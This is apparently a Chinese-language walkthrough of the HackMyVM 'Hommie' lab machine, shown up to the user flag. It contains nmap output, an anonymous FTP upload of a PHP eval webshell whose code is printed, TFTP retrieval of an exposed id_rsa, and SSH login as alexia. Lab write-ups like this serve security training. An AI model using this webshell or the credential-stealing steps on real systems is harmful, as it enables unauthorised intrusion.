Hommie
备注
[Linux VM] [Tested on VirtualBox] created by || sml
⏲️ Release Date // 2020-09-30
✔️ MD5 // 5c6915e238e3e0647e1d508522907c74
☠ Root // 225
💀 User // 230
📝Notes // Enumeration is the KEY. Tested on VirtualBox.
靶机启动
靶机 IP:
192.168.56.105
nmap 信息搜集
Nmap scan report for 192.168.56.105
Host is up (0.00031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c627ab53abb9c020373652a960d353fc (RSA)
| 256 483b281f9a23da71f6050ba5a6c8b7b0 (ECDSA)
|_ 256 b32e7cff622d53dd6397d44772c84e30 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:B6:0D:21 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
可以发现 ftp 服务允许匿名访问,肌肉反应可能存在 ftp 控制 web 服务的目录,进而实现写入 webshell 得权
访问 web 服务
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $http get 192.168.56.105
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Fri, 22 Dec 2023 15:03:52 GMT
ETag: W/"5f749979-63"
Last-Modified: Wed, 30 Sep 2020 14:43:05 GMT
Server: nginx/1.14.2
Transfer-Encoding: chunked
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody
出现两位人物:
alexia
nobody
利用 ftp 服务匿名登陆
ftp 服务允许匿名访问
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $ftp 192.168.56.105
Connected to 192.168.56.105.
220 (vsFTPd 3.0.3)
Name (192.168.56.105:randark): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
列出所有目录和文件
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
查看 .web
目录
ftp> cd .web
250 Directory successfully changed.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 2 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
226 Directory send OK.
并且可以上传 webshell
ftp> put webshell.php
local: webshell.php remote: webshell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
32 bytes sent in 0.00 secs (459.5588 kB/s)
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 2 0 113 4096 Dec 22 10:17 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
-rw-r--r-- 1 106 113 32 Dec 22 10:17 webshell.php
226 Directory send OK.
尝试访问 webshell
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $http get 192.168.56.105/webshell.php
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 32
Content-Type: application/octet-stream
Date: Fri, 22 Dec 2023 15:18:06 GMT
ETag: "6585a881-20"
Last-Modified: Fri, 22 Dec 2023 15:17:21 GMT
Server: nginx/1.14.2
<?php @eval($_POST['shell']) ?>
文件可以正常返回,但是服务端并不会解析 php 文件
利用 tftp 服务下载 id_rsa
并加以利用
下载 id_rsa
文件
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $tftp 192.168.56.105
tftp> get id_rsa
Received 1850 bytes in 0.0 seconds
利用私钥登录 SSH
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Hommie]
└──╼ $ssh alexia@192.168.56.105 -i id_rsa
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Dec 22 10:59:52 2023 from 192.168.56.102
alexia@hommie:~$ whoami
alexia
user pwned
alexia@hommie:~$ cat user.txt
Imnotroot